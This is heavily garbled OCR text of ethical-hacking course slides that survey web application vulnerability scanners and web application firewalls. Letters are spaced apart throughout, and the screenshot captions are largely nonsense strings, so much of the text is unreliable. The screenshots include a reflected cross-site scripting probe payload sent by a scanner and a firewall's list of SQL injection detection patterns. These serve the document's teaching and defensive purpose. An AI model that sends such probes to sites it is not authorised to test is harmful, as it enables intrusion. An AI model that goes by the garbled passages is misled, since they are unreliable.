(# Web A pplication Security Tool: Acunetix Web V ulnerability Scanner

S o u rc e : h t t p : / / w w w . a c u n e t i x . c o m A c u n e tix Web V u ln e ra b ility S canner a u to m a tic a lly checks y o u r w e b a p p li c a t i o n s f o r SQL
in j e c t i o n , XSS, a n d o t h e r w e b v u ln e r a b i l it ie s . It in c lu d e s a d v a n c e d p e n e t r a t i o n t e s t i n g to o ls , such as t h e HTTP E d ito r a nd t h e HTTP Fuzzer. It p o r t scans a w e b s e r v e r a n d r u n s s e c u r it y ch e c k s a g a in s t n e t w o r k servic es. It e v e n te s ts w e b f o r m s a n d p a s s w o r d - p r o t e c t e d a reas. T h e a u t o m a t i c c l i e n t s c r ip t a n a ly z e r a llo w s f o r s e c u r it y t e s t i n g o f A j a x a n d W e b 2 .0 a p p li c a t i o n s .
EC-C0UnCil

In
File Actions Tools J Configuration >- A H dp
Acunetix Web Vulnerability Scanner (Free Edition)
1-1
I New bean | ' |Tools Explore;
K? |
<
& |
| * 0 j ^ * A Report/ Star: | Profile: |Default - UR.: a http://testaspnet.vulrwel star:
|a | Web Vulnerablity Scanner web scanner
B 07 T o o la
H 5 fr Sice Crawler \f i Target Firder
Scan R es u lts - [a] S canThread 1( http://testaspnetvuhweb.

B Web Alerts (77) (3 0 ASP .NET Padcmg Drade Viinefab* ffl 40 bind SQL injenxx ( ) S ^ 0 C 0 0 0 0 0 ^ 0 0 0 0 0
Alwts summary
77 alerts Acunetix Threat Level 3 One or m ore highseveritytype vulnerabilities have been discovered b y the scanner. Am alicious user can exploit these vulnerabilities and com prom isethe
backend database and/or deface your website.
A acunetix threat level
B in dS Q LIn je c to r@ H T T PE d it o r H T T PS n iffe r H j j ]H T T PF u z z e r h -d A u th e n tic a tio n T e s te r

: - BS Compare Results
....... S u b d cm ain S can n er
L e v e l 3: High
Cross Site Scrpbng (verified} (10)
B
B B B B B B B B B B B
S Q L in jectio n (verified] (21)

Application error messaoe (3) ASP.NET error message (1) Cross Fra-ne Scripting ( )
Total alertsfound
0 High
B -fi? W eb Servces W eb Servces S can n er W eb Servces E d ito r

B j Configuration
User credentials ae sent in dear te. Login page password-guessing attec CPTIONS metnod s erabled (1) Session Cookie without Secure flag Error page Web Sefve- vetsior dsd QHDB: Frontpage extensions for Uni QHDB: Possible ASP.fCT sensitve i Q O B : Tycal login paje (10)
OM e d iu m
O 0 lo w Informational
i Application Settinos Scan Settings
,jj Target inform ation ^ ^tabstia
t!ttp://testaspnet.vulnweb.com :80/ 7322 requests scan isnm sned
....Scannng Profiles 23<
H-f^r G cn ero l P ro g ramLpdates ^

Version Information 0 j f Licensng suppat center

100.00% @
Passw ordtype input wth au to co m p Tv
1* P rogress
< | _
A ctivity V /ind o w
M l
|> | 1
P urch ase
)User Manual (html User Manual (pdf ]<( ' # AcuSensor
10.20 01:30.02, SQL njection (venfied) 'Aeadnews.aspx* cn pararreter V T
10.20 01:3237, Finished scanning. 10.20 01132.37, S aving s canresu lts todatabase ..
10.20 01:32.39, Done saving database. 10.20 01:32.39, Hush file butlers. |Aîcaton''(^]| Error Log
Ready
FIGURE 13.62: Acunetix Web Vulnerability Scanner Tool Screenshot
EC-COlMCil
Web A pplication Security Tool: Watcher Web Security Tool

J W a tc h e r is a p lu g in f o r t h e F id d le r HTTP p r o x y t h a t p a s s iv e ly a u d its a w e b a p p lic a tio n t o fin d s e c u r ity b u g s a n d c o m p lia n c e is s u e s a u t o m a tic a lly
C EH
/ * ,
Q 5H W o
jg I w p e c t o r s I / * u t o R e a p o n d i r | ID Log I mcto;
R e q u e s tBuoa 1
WfaSaK v8'
I_ E
Header - Check tM catrte-ojitm l HTTP header met to the regorg' H *a< 1* 0 * 3 that a Cortart -Type n U hciuded h the HTTPreeponee and ê>t8 whent <* Header Checks that IE?* XSSprotecten Bier K oartf been ebabled bythe Webappteabon ader Check*mat the XOONTENT-TYPEOPTtONSdeferwe aflarvt M1MEfFlnflhabeen dedwd*4 Header Checks th* !he XFRAMEOPTIONSheader n berg set for defer aqarat CkkJaefcro'attacks B Hwdy L ccfcter .ek aUt-rBcaticr prctocda 0 rtomjloi {c!c*/n Owck for conwon emt nrnagai tunedby database* *Hi* may r d a e 931 ! 7 rfy -Bcn Dadeare Oieek for dubom eoiment that vnairartfutheraBemicr HornAon D*3cjv Looktoi mUv rtanntieripajesdttrojtfi HTTPwwwt olunw! w*ra look for semttve rfenrater paiied Ihrouî U R L(M raweters
J J J
L o c kfo ri*ue*H blteB a tba o a e < fc n a inp cicyfile
v A x
~ 7
SDLO* M /A WASP ASA2 OW ASP ASVU
f / iJ a < * u t o t bu w r ^ r * 1 c r t c o J * f o ruwc < d # > 3 r 0 u sr j i 1 ) f T K < J x h
kV.wBSX
TSrt rw k mil srarch MTMl convnt, ineludmo comment! k common error mcssnor * returned by ptmtewns sue! as Af.PNTT and Web savers such 09 IIS ond Apoebe Y < hh 1 ftonfioure Ibe l!v of common debug mev-wsoes look tor
| 6#<t
| fxpoe WeAod HTWLRwait
'S o Jf t * . '*
it* nge at Vie M mmrq U R i.1
r-otfcuBtad.tan/mfebw/Chfc. Pmv.lttCant;9ld.Jr/KJ vlv<t. ;>v?ul mrTMtVdw*
r r t t h o S c r c lavaanix ivonti Ahrti may bo arradar^mtr6Ufi*a
1 Jl*i nw A nrdm # * o Io * 1qdauof a ncrto a d 'e v e n ts
2)U M *-txw 4 fardmth e c l1> A '0dauof a no rrro u e e o w evtn ts

PH >ttarnng PH&ror
V i'a rrrg :C a rr m vsd iH to iis

C 3 S 3 B 3
ytm ralje
IV* j rxjut m i: 3 User -rp>-f aa fartd m the felong data of an 'cnerror' event;
watdier Web Security Tool vt^.O, Copy right C 2010 C3;3ba Seem.. ..C- A JI tc!*t: reserved.
casasa
Aatc V/cDSecurity Tool vlJ.O, CooyriQht20:0 Casa&a Security. LLC. All risnu reserved.
http://www.casaba.com
Copyright by EG -G llic il. All Rights Reserved. Reproduction is Strictly Prohibited.
JL
Web A pplication Security Tool: W atcher Web Security Tool
S o u rc e : h t t p : / / w w w . c a s a b a . c o m W a t c h e r is a p lu g in f o r t h e F id d le r HTTP p r o x y t h a t p a s s iv e ly a u d it s a w e b a p p li c a t i o n t o fin d s e c u r it y bugs a n d c o m p li a n c e issues a u t o m a t i c a ll y . Passive d e t e c t i o n m e a n s it's s afe f o r
p r o d u c t i o n use. It d e t e c t s w e b - a p p l i c a t i o n s e c u r it y issues a n d o p e r a t i o n a l c o n f i g u r a t i o n issues.
Ethical Hacking and C ounterm easures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

FIGURE 13.63: Watcher Web Security Tool Screenshot
EC-C0UnCil

Web Application Security Scanner: Netsparker

J N e ts p a rk e r p e r f o r m s a u to m a te d c o m p r e h e n s iv e w e b a p p lic a tio n s c a n n in g f o r v u ln e r a b ilitie s in je c tio n , c r o s s -s ite s c r ip tin g , r e m o te c o d e in je c tio n , e tc . J I t d e liv e r s d e te c tio n , c o n f ir m a tio n , a n d e x p lo ita tio n o f v u ln e r a b ilitie s
C EH
s u c h as SQ L
in a s in g le in t e g r a t e d e n v ir o n m e n t
s fa
1 1
CMnWSw
Cross-site Scripting
U R L
l a x / / 1c5tJ7.ne2Mrtr.cQm:8l8! 1fflefwra/MSiDyreftected3 2 ,otol P* * H * 0101 6 * j . Krtpt: c
PA R A M ET ER ptrm M A M E PA R A M ET ER T V PC (Jjfryitnnj A T T A C K PA T T tR M <KJtX>fefl(0100001a)< VULNERABILITY DETAILS X SS(OwrMt S o H A m u )dv1 tv * .* * dr*on1 kjhA (!**C'pC V W c 1 <( >* U o* a 0 p b catn alc t t. ts il M V irtn t o * p 4 rtu n * 1 4 m o ith t cvr< n t M ix yi tt *x m r t*tfunfm ]V m kvoV (4ttw *0 M )*b * w tm* vto ^
k i k i
CLASSIFICATION
:.0 tu LU
a:
OWAV
* G ra jp b je 1b y M l 9V jln t < jb 1 K v T > o
S c a ra n d C o n fa rra tc n firn ts d
J fV o r y :S y s te m lM o n e J h ttp ://w w w . ma vitunasecurity. com

Web A pplication Security Scanner: Netsparker

'v S o u rc e : h t t p : / / w w w . m a v i t u n a s e c u r i t y . c o m N e ts p a rk e r can f i n d a n d r e p o r t o n s e c u r it y v u ln e r a b i l it ie s such as SQL i n j e c t i o n a n d cro s s -s ite s c r ip t in g (XSS) in all w e b a p p lic a tio n s , re g a r d le s s o f t h e p l a t f o r m a n d t h e t e c h n o l o g y t h e y are b u ilt on. It a llo w s y o u to re s o lv e s e c u r it y p r o b l e m s b e fo re th e y 're a c t u a l ly m is u s e d a nd c o m p r o m i s e d b y u n k n o w n a tt a c k e r s .
EC-C0UnCil

Q ] tcrst37.nebpdrker.eom - Netipaikei 2.0.0.0 ( Mavituna Security Limited -1 Seat) I ; File tyew Reporting Settings Community fcjelp j ? Stoit u1
r s if s ir w i j
Slort Jcw Scon
Vulnerability
Browser View
Retest
HTTP Request / Response
test37.netspahcer.com :8081 x sstb

0 reflected
Controlled Scan
0 - & dilemma
C ro s s -s ite S c r ip t in g
URL
param=<script>alert(0x000016)<! script?
C O N F IR M E D
32.php
1| J *
Apache V ersion Apache V ersion PHP Version D is ?param } Cross-site S <
h t t p : / / t e s t 3 7 . n e t s p a r k e r . c o m : 8 0 8 1 / d lle m m a / x s s t b , r e f le c t e d / 3 Z .p h p
PARAMETER param NAME PARAMETER Querystring TYPE ATTACK <scrlpt>alert(0x000016)</scrlpt> PATTERN
VULNERABILITY DETAILS
bean
CLASSIFICATION
PCI 2.0 PC11.2 OWASP 6.5.7 6.5.1 A2 -
Nnished
0 0 0 2/ 0 0 0 2
Scar Information
Current Speed: 2,6rcq.'5cc Average Speed: 3,7 req/sec Total Requests: 37 Fxiftd R#quet<
XSS (C ross-site Scripting) allow s an a tta c k e r to execute a dynam ic scrip t {)avascrot, VbScript) in th e co n te x t o f th e application. This allow s several d ffe re n t attack o p p o rtu n itie s, m ostly hijacking th e c u rre n t session o f th e user or changing th e lo o k o f the page by changing th e HTML on th e fly to 3teal th e
1-1
Cross-site Scripting dilemma/xsstb/refle<te<j/32.php 1paam)
Group Issues by Vulnerability T/pe C Severity
f+ 1 |&) Apache Version Disclosure

Gi-ptt PHP Vtrcion Dicdotur* G J 0 Apoche Version Is Out Of Dote
HEAD Requests: 0 Elapsed T im e: 00:00:10
Issues (*)
Encoder
IT Logs (4)
Scan and Confirmation finished.
j f 1 Proxy: Svstem[Ncne]
FIGURE 13.64: Netsparker Tool Screenshot
EC-C0UnCil

W e b A p p lic a tio n W e b A p p lic a tio n
S e c u r it y T o o l: N S ta lk e r S e c u r ity S c a n n e r
EH
N -Stalker W eb A p p lica tio n S e cu rity Scanner is an e ffe c tiv e s u ite o f w e b s e c u rity a sse ssm e n t ch ecks to enhance th e o v e ra ll s e c u rity o f w e b a p p lica tio n s a ga in st a w id e ra ng e o f v u ln e ra b ilitie s and s o p h istica te d hacker atta cks
Ifryfr > 1 > 1 N ' M-Suker M S ia k e r Sen S e tner n w Scan Cffcri

5 W rt5 c a n
NS *3lkerW eb Application S ecu rity S canner2012 - Free E dition
I t co n ta in s all w e b se c u rity a ssessm ent checks such a s : e e Code injection Cross-Site scripting Param eter tam pering W eb server vulnerabilities
I r. -:n AtMMffl 0
rl
mil.() M iJ (P) Low 1) MI>
\l
5'.U . 1 S'.atei Sca'1-W
wM jojo , .. aT > rh i> S

h brae a
h ttp://nstalker.com
fjH^ Web A pplication Security Tool: NStalker Web _ Application Security Scanner
S o u rc e : h t t p : / / n s t a l k e r . c o m N -S ta lk e r W e b A p p lic a tio n S e c u r ity S c a n n e r p r o v id e s an e ffe c tiv e s u it e of web s e c u r it y
a s s e s s m e n t ch e cks t o e n h a n c e t h e o v e r a ll s e c u r it y o f y o u r w e b a p p l i c a t i o n s a g a in s t a w i d e r a n g e o f v u l n e r a b i l it ie s a n d s o p h is t ic a t e d h a c k e r a tta c k s . It also a llo w s y o u t o c r e a te y o u r o w n a s s e s s m e n t p o lic ie s a n d r e q u i r e m e n t s , e n a b lin g an e f f e c t i v e w a y t o m a n a g e y o u r a p p li c a t i o n 's SDLC, in c lu d in g t h e a b i l it y t o c o n t r o l i n f o r m a t i o n e x p o s u r e , d e v e l o p m e n t fla w s , i n f r a s t r u c t u r e issues, a n d real s e c u r i t y v u l n e r a b i l i t i e s t h a t can be e x p l o r e d by e x t e r n a l a g e n ts . It c o n ta in s all web s e c u r it y assessm ent ch e c k s such as code in j e c t i o n , c ro s s -s ite s c r ip tin g , p a ra m e te r
t a m p e r i n g , w e b s e r v e r v u ln e r a b i l it ie s , e tc .
EC-C0UnCil

N -S la k e r W eb A p p lic a tio n Security Scanner 2012 - Free E dition
TO
N -S ta k m S c a n n e r S ta rtS c a n n ^ n aftC ra w le rS a tin p a* : : C C o n tro lO p to n *f wG tftrjj J 1 T h re a d sa .E n c o d cU R I(I* S ) E S ta rtP ro x y U R L R e s tric tio nS e ttin g s1 tX J JH T T P F P K e y w o rdF e r T n e c u t1 5t | O d o t*S e ttlO fl S e a s o n M g m t F fl e ra 8: s e s s io nC o n tro l T h re a d sc o n tro l s p id e rc o n tro l t a is e -P o s * v eC o n tro l : n ttp / 1 0 0 0 2 j'
ft S c a n n e r
Ci O o je c ts
aD a s h b o a r d
Site Sequence )5 J j Allowed Hosts Rejected hosts % . Ccckes
S c rp ts - )1 1 ( M pC o m m e n ts)1 1 ( nW e bF o rm s)5 ( ) E -tn a ts

j p Broten pages ) 1( Hidden FtekJs Information LeiLage ) 1 jnerablities / ' 0 J ht1p//l0 )+( 0 0 2/
* C o o p t.** ^ C o*.** N \ Irto G e c^ N < ( 0 7 M S D m *( S c a n S e s s o a_ S ta r;T m e D c 2 C .2 3 1 23 * :3 :5 3 C H e irs4 M rjte 3 S p id e ^ 9 8 03 C ra w le d U R L s 1 5 C ra w le db o s s 1 D e fa u iP a jeS z e 5 6 .1 1 7D rie s h ig h1 0 )N i l (9 )L o w (1 ) in ro(2 ) S c m E n y n a rutwort * B y te sS e rt 9 0 1 .5 2 6 T o ta lR e c u e s ' 3 2 9 2 6 6 v ie sR e c e iv e d 2 .0 2 91 1 0 F a te dR e q u e s ts 0 A * 0 R e s c o n s eT im e 3 5 2 5m s A tia c tsS e rf 3 1 5 2 6 1 7 A v qT ra n s fe rR ite 1 .7 5 2 8 8 K B /s * 0 4E rro rs 3 0 ?R e d rc c to n 0 F e o je s t& v ru te 7 3 10 0re o /m n
S ta tu s .N > S ta k e rS c a n n e rs e a s o nisb e in gc to s e d ..[D a s h b o a rd T h re a d )

FIGURE 13.65: N-Stalker Web Application Security Scanner Tool Screenshot
EC-COUIlCil

W e b A p p lic a t io n V a m p ir e S c a n
S e c u r i t y T o o l:
EH
V a m p ire S c a n
VampireScan allows users to test their own Cloud and Web applications for basic attacks and receive L actionable results all within their own Web portal
F e a tu re s
e
e
P rotect yo u r w ebsite fro m hackers Scan and p ro te ct yo ur infrastructu re and w eb applications fro m cyberthreats
Give you direct, actionable insight on high, m edium , and low risk vulnerabilities
http://www.vam piretech.com
^ Web A pplication Security Tool: NStalker Web 0 , . Application Security Scanner

S o u rc e : h t t p : / / w w w . v a m p i r e t e c h . c o m V a m p ir e S c a n a llo w s users t o t e s t t h e i r o w n C lo u d a n d W e b a p p li c a t i o n s f o r basic a tta c k s a n d r e c e iv e a c t i o n a b le r e s u lts all w i t h i n t h e i r o w n W e b p o r t a l . It can p r o t e c t y o u r w e b s i t e f r o m h a c k e rs . T his t o l can scan a n d p r o t e c t y o u r i n f r a s t r u c t u r e a n d w e b a p p li c a t i o n s f r o m c y b e r - t h r e a t s a n d can also g iv e y o u d ir e c t , a c t i o n a b le in s ig h t o n h ig h , m e d i u m , a n d l o w risk v u ln e r a b i l it ie s
EC-C0UnCil

1Summary
Se cu rity Grades Statistics Queued Scam Scans h Progress Accoutt Balance Unused Services Expiring Unused Services
A B C OI
F
0 0 $ 0 .00
Recent Activity
D rv n p lio n Q w San SM f rortW sc4nl*t1 sca n le il? Sm ncr Lat0 t Re*uft% Q o w \ R u n tw 3/28/2012 2 * 2 PM 3/27/2012 2:17 PM 3/24/2012 :12 AM HARM V .* r 2960 Vuln. M /M /l 6/2/0
0
R ev** Grade Previous Scam
S tatu s
W rt Site URl scan teil? %cane*11
m m m m m m
n
289 193/214/271 2314 124/148/113 4370 14634 12/1/0 44/42/65 &M Htory
M#a*rvO>eA 3/13/2012 1 0 5 3 AM SM r 12/1S/20U 5:18 PM M
* 4 ?* \ O il
m m
Show. S 10 20 SO 100 200
FIGURE 13.66: N-Stalker Web Application Security Scanner Tool Screenshot
EC-C0UnCil

Web A pplication Security Tools

IH L T SandcatMini
http://w w w .syhunt.com
C EH
Websecurify
h ttp ://w w w . websecurify.com
OWASP ZAP
h ttp ://w w w . owasp. org
NetBrute
h ttp ://w w w . rawlogic. com
skipfish
| ___ j ^ http://code.google.com
W hi
X5s
h ttp ://w w w . cas aba. com
SecuBat Vulnerability Scanner

http ://se cub a t. code pie x. com
f t .
'
WSSA -Web Site Security Scanning Service

https://secure.beyondsecurity.com
SPIKE Proxy
h ttp ://w w w . im munity sec. com
Ratproxy
h ttp ://co d e , google, com
Copyright by EC-Cauncil. All Rights Reserved. Reproduction isStrictly Prohibited.

W eb a p p li c a t i o n s e c u r it y t o o l s a re w e b a p p li c a t i o n s e c u r it y a s s e s s m e n t s o f t w a r e d e s ig n e d t o t h o r o u g h l y a n a ly z e t o d a y 's c o m p le x w e b a p p li c a t i o n s w i t h t h e a im o f f i n d i n g e x p l o i t a b l e SQL in j e c t i o n , XSS v u ln e r a b i l it ie s , e tc . T h e s e t o o l s d e l i v e r s c a n n in g c a p a b i l it ie s , b r o a d a s s e s s m e n t c o v e r a g e , a n d a c c u r a te w e b a p p li c a t i o n s c a n n in g re s u lts . C o m m o n l y used w e b a p p li c a t i o n s e c u r it y t o o l s a re lis te d as f o l lo w s : S a n d c a t M i n i a v a ila b le a t h t t p : / / w w w . s y h u n t . c o m O W A S P ZAP a v a ila b le a t h t t p : / / w w w . o w a s p . o r g s k ip fis h a v a ila b le a t h t t p : / / c o d e . g o o g l e . c o m S e c u B a t V u l n e r a b i l i t y S c a n n e r a v a ila b le a t h t t p : / / s e c u b a t . c o d e p l e x . c o m SPIKE P ro x y a v a ila b le a t h t t p : / / w w w . i m m u n i t v s e c . c o m W e b s e c u r i f y a v a ila b le a t h t t p : / / w w w . w e b s e c u r i f y . c o m N e t B r u t e a v a ila b le a t h t t p : / / w w w . r a w l o g i c . c o m X5s a v a ila b le a t h t t p : / / w w w . c a s a b a . c o m W SSA W e b Site S e c u r ity S c a n n in g S e rvice a v a ila b le at h ttp s ://s e c u re .b e v o n d s e c u ritv .c o m
EC-C0UnCil

R a t p r o x v a v a ila b le a t h t t p : / / c o d e . g o o g l e . c o m
EC-C0UnCil


( C o n t d )
Wapiti
h ttp ://w a p iti, source forge, net
C EH
ip i
Syhunt Hybrid
h ttp ://w w w .syh u n t. com
WebW atchBot
h ttp ://w w w . exclamations oft. com
Exploit-Me
http:/'/labs, securitycompass.com
f -r K
!\
KeepNI
h ttp ://w w w . keepni. com
( P"

WSDigger
h ttp ://w w w . mcafee. com
Grabber
http ://rg a uch e r. info
Arachni
http://arachni-scanner. com
xsss
h ttp ://w w w . s yen. de
Vega
h ttp ://w w w . s ubgraph. com
Web A pplication Security Tools (Contd)

In a d d i t i o n t o t h e p r e v io u s ly m e n t i o n e d w e b a p p li c a t i o n s e c u r it y to o ls , t h e r e a re f e w m o r e t o o l s t h a t can be u sed t o assess t h e s e c u r it y o f w e b a p p lic a tio n s : W a p i t i a v a ila b le a t h t t p : / / w a p i t i . s o u r c e f o r g e . n e t W e b W a t c h B o t a v a ila b le a t h t t p : / / w w w . e x c l a m a t i o n s o f t . c o m Ke ep N I a v a ila b le a t h t t p : / / w w w . k e e p n i . c o m G r a b b e r a v a ila b le a t h t t p : / / r g a u c h e r . i n f o XSSS a v a ila b le a t h t t p : / / w w w . s v e n . d e S v h u n t H y b r id a v a ila b le a t h t t p : / / w w w . s v h u n t . c o m E x p l o i t - M e a v a ila b le a t h t t p : / / l a b s . s e c u r i t y c o m p a s s . c o m W S D ig g e r a v a ila b le a t h t t p : / / w w w . m c a f e e . c o m A r a c h n i a v a ila b le a t h t t p : / / a r a c h n i - s c a n n e r . c o m V ega a v a ila b le a t h t t p : / / w w w . s u b g r a p h . c o m
EC-C0UnCil
Exam 312-50 C ertified Ethical Hacker
Web A pplication Firewall: dotDefender

d o tD e fe n d e r is a s o ftw a r e based W e b A p p lic a tio n F ire w a ll I t c o m p le m e n ts th e n e t w o r k f ir e w a ll, IP S and o th e r n e tw o rk -b a s e d In te r n e t s e c u rity p ro d u c ts I t in s p e c ts th e HTTP/HTTPS t r a f fic f o r su sp icio u s b e h a v io r I t d e te c ts a n d b lo c k s SQ L in je c tio n a tta c k s A M e * v e w *o v o m rs . *h c * < c b tO e frn d E r (3 2 9d a y sfc ft) iJ U E v e n tV ie w ?(L o c rf) _ tl In te rn e tIrrfo n ria a a rS e r*
4> GfabalSettr^s {2) DeâiJt Scanty FtoSe p-otec Server Ms*ng [ Lptoad FoWe5 0 Patterns awM* ffl fel WhalBt (Perm!*d a a 2) Pararoe
C EH
d tDefender
i 9 SQL Infection
ype
[ f l B j f f r r0 . e f b a 2 1S Q Llr!j*c t> c r
LaercHhed [U i CT0B-5WSOW Snc C U ,,7 )Patfi s.esal Pôb': L tl Rno(e camand txec H I if?! Irwctcn IU vmdow* Drcrtorm ar H J .2) *M l '.+m1
ij ij fg tE n c o tln Q
v .
so l r t -
w Suspect Single Quote (Safe)

Pattern = Pattern Classic SQL Comment
C 7 ) u J ) e A ? &C
D Q Q
w SQL Comments
Q
ID^ 2 )**<ln ty *rra n
Union Select Statement
U U a ) waih Croat 4* ..rpe
uo s r fl *! P i*9 J 'd . Atn*F T PS f* :JwLVaJi:
W Select Version' Statement

P SQL CHAR Type
W SQL SYS Commands W IS SRVROLEMEMBER followed by (

MS SQL Specific SQL Injection
h ttp ://w w w . opplicure.com
55^ Web A pplication Firewall: dotD efender

S o u rc e : h t t p : / / w w w . a p p l i c u r e . c o m d o tD e f e n d e r is a s o f t w a r e - b a s e d w e b a p p li c a t i o n f i r e w a l l t h a t p r o v id e s a d d it io n a l w e b s i t e s e c u r it y a g a in s t m a lic io u s a tta c k s a n d w e b s i t e d e f a c e m e n t . It p r o t e c t s y o u r w e b s i t e f r o m m a lic io u s a tta c k s . W e b a p p li c a t i o n a tta c k s such as SQL i n j e c t i o n , p a th tr a v e r s a l, c ro s s -s ite s c r ip tin g , a n d o t h e r a tta c k s le a d in g t o w e b s i t e d e f a c e m e n t can be p r e v e n t e d w i t h d o t D e f e n d e r . It c o m p l e m e n t s t h e n e t w o r k f i r e w a l l , IPS, a n d o t h e r n e t w o r k - b a s e d I n t e r n e t s e c u r it y p r o d u c ts . It in s p e c ts HTTP/HTTPS t r a f f i c f o r s u s p ic io u s b e h a v io r .
Ethical Hacking and C ounterm easures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

flle A c tio n v ie w P a v o ilte s V /h d o wH rlp
-Iffl X l
d t D e f e n d e r

O license
I B I _______
^ d o t O t f e n d e r( 3 2 9d a y el e H )
FI b ; E/cnt Vic no (locd)
I dn I n t e r n e tJ p f o r r n a t o nS e n / i c t c(
Ac s c b a ls # t1 !rg s
0 { f Default Security FYofile (Protec J ] sewer Ma?icrc 1 1 SQL Injacfion Upload Folders 0 Patterns Choose which type of SQL Injection attact-s to nte'ccpt 0 lAiWte#*t (Permitted A c<
0 L s ? Pcnad 0 E n c o d i n g 0 Buffer O v e r f l o w B I G SS Q LI n j e c t i o n
User Defired t j Best Practices 0 Cross-Site Sanptrg 0 Cookie Manipulation 0 f e Pah Traversal
1 7 Suspect Single Quote (Safe) Pattern = Pattern F Classic SQL C o m m e n t , SQL Comments
Q D D D D D 0
0 62 P r o b n c
Hi f e Rerote cormard Exec 0 Code Inaction ra LZ Windows Drectorfes an 0 XM. Schema 0 LZ XPoth Injection 0 XPath Crccs Ste Scroa Soroturea (Us# Default) Q Athena =TP Ste (Ltec Default)
1 7 Union Select Statement 1 7 Select Version Statement 1 7 SQL CHAR Type 1 7 SQL SYS C o m ma n d s 1 7 IS_SRVROLEMEMBER followed by ( 1 7 M S SQL Specific SQL Injection
FIGURE 13.67: dotDefender
EC-C0UnCil

Web A pplication Firewall: ServerDefender VP

S efverD efender V PS ettin g sM anager
c EH
(rtifwd ItkMJl lUckM
ServerDefender VP Web application firewall is designed to provide security against web attacks
port80
l-ojt <'adaton Buffer Overflow | Resources | Me*cds JU3 | RicUptoa-s | ectpm ts Common"Pireats SQ L Injection &Z|aoACfttJ9teStTplng(>SS) Gcnenc ]ru t wrrtiratwn MribicdKTWl_______________ v_
O i N o n e
$l**Mun 0 ^. II. 1 2 ,H3 1 ,1 2 7 ,1 7 5 2 2 3 ,2 5 $ ) Mnmum C) Extended (>,
OPwanad (L *. '>> )] *Madid
http://w ww .port80softw are.com
Web A pplication Firewall: ServerDefender VP
Q i
S o u rc e : h t t p : / / w w w . p o r t 8 0 s o f t w a r e . c o m
T h e S e r v e r D e f e n d e r VP w e b a p p li c a t i o n f i r e w a l l is d e s ig n e d t o p r o v id e s e c u r it y a g a in s t w e b a tta c k s . SDVP s e c u r it y w ill p r e v e n t d a ta t h e f t and b re a c h e s a n d s to p u n a u th o riz e d site
d e f a c e m e n t , f ile a lt e r a t i o n s , a n d d e le t io n s .
EC-C0UnCil

ServerDefender VP Settings Manager

Fil Configur# H#lp
s e r v e r d e fe n d e r V P
W E B APPLICATION FIREWALL
p o rt8 0
Protection for Default Web Site is O N
4 : Sit* || Status j b i Resporse Mgmt / ^ \ Session Mgmt
W IN -ETLR P 50T7LB m Default P ro file J Default W eb S ite (C ustom )
O FF LO GO N LY O O N
E Mgmt Admir Options
Mgmt
Input V afc d a tio n B irfier O verflow J R esources | M ethods | U R L s |F ile U ploads ] E xceptions
Generc Input S an itizatio n O None () [0-9, 11, 12, 14-31, 127,175-223, 255]
C Extended [>, <, + M nm um C P aranoid [|, +Extended
Sam teation A ctio n : Deny and Log
Apply
-f ServerDefender VP Settings Manager

Me Configure Help
serverdefender VP
W E B APPLICATION FIREWALL g
p o r t8 0
Protection for Gauntlet is O N
Enforcement Level |G e n e r c P iiA c S ite *] 1 2 3 4 5 Sh ow Details
R ED B R IC K V Default P rofile V Default W eb Site A dm inistration

Assets
O FF LOG ONLY 0 O N
Site Status | Blocked IP s | Aierbng | Reporting | Refresh Currently Blocked IPs Total Error Count 723 LogViewer Total | 7 404 |
ServerDef enderVP Statistics Total HTTP Requests 26719 Error Statistics S*e 1 Default Web. Gauntlet Administration Assets Total Sessions Created 752
Sn ce 11/8/2011 Currently Active Sessions 750 Total Blocked IPs
SQL I
XSS I
Input I
Cookie I
Other | 3
Expert View
OK
Cancel
Apply
FIGURE 13.68: ServerDefender VP
EC-C0UnCil

Radware's AppWall
h ttp ://w w w . radware. com
Barracuda Web Application Firewall

https ://w w w . barracudanetworks. com
n ss^l 1 j
r- '
ThreatSentry
h ttp ://w w w . privacy ware, com
I3 H
Stingray Application Firewall

h ttp ://w w w . riverbed, com
QualysGuard WAF
h ttp ://w w w . quatys. com
IBM Security AppScan

h ttp ://w w w -01. ibm. com
ThreatRadar
h ttp ://w w w . imperva. com
Trustwave WebDefend
https ://w w w . trus t wave, com
ModSecurity
h ttp ://w w w . modsecurity. org
Cyberoam's Web Application Firewall

h ttp ://w w w . cy beroam, com
W e b
A p p lic a tio n
F ir e w a lls
W e b a p p li c a t i o n f i r e w a l l s s e c u r e w e b s ite s , w e b a p p lic a tio n s , a n d w e b s e rv ice s a g a in s t
k n o w n a n d u n k n o w n a tta c k s . T h e y p r e v e n t d a ta t h e f t a n d m a n i p u l a t i o n o f s e n s itiv e c o r p o r a t e a n d c u s t o m e r i n f o r m a t i o n . C o m m o n l y u sed w e b a p p li c a t i o n f i r e w a l l s a re lis te d as f o l lo w s : R a d w a r e 's A p p W a l l a v a ila b le a t h t t p : / / w w w . r a d w a r e . c o m T h r e a t S e n t r y a v a ila b le a t h t t p : / / w w w . p r i v a c y w a r e . c o m Q u a ly s G u a r d W A F a v a ila b le a t h t t p : / / w w w . q u a l y s . c o m T h r e a t R a d a r a v a ila b le a t h t t p : / / w w w . i m p e r v a . c o m M o d S e c u r i t y a v a ila b le a t h t t p : / / w w w . m o d s e c u r i t y . o r g B a r ra c u d a W e b A p p l i c a t i o n F ire w a ll a v a ila b le a t h t t p s : / / w w w . b a r r a c u d a n e t w o r k s . c o m S t in g r a y A p p l i c a t i o n F ire w a ll a v a ila b le a t h ttp ://w w w .r iv e r b e d .c o m IB M S e c u r ity A p p S c a n a v a ila b le a t h t t p : / / w w w - 0 1 . i b m . c o m T r u s t w a v e W e b D e f e n d a v a ila b le a t h t t p s : / / w w w . t r u s t w a v e . c o m C y b e r o a m 's W e b A p p l i c a t i o n F ire w a ll a v a ila b le a t h t t p : / / w w w . c y b e r o a m . c o m
EC-C0UnCil

M o d u le F lo w
C EH
f a
S ecurity Tools
Q Q Q
**S
C o u n term ea su re s
M o d u le
F lo w
As m e n t i o n e d p re v io u s ly , w e b a p p li c a t i o n s a re m o r e v u ln e r a b l e t o a tta c k s . A t t a c k e r s use w e b a p p li c a t i o n s as t h e s o u rc e s f o r s p r e a d in g a tta c k s by t u r n i n g t h e m a p p li c a t i o n s o n c e c o m p r o m i s e d . Y o u r w e b a p p li c a t i o n i n t o m a lic io u s o f such
m a y also b e c o m e a v i c t i m
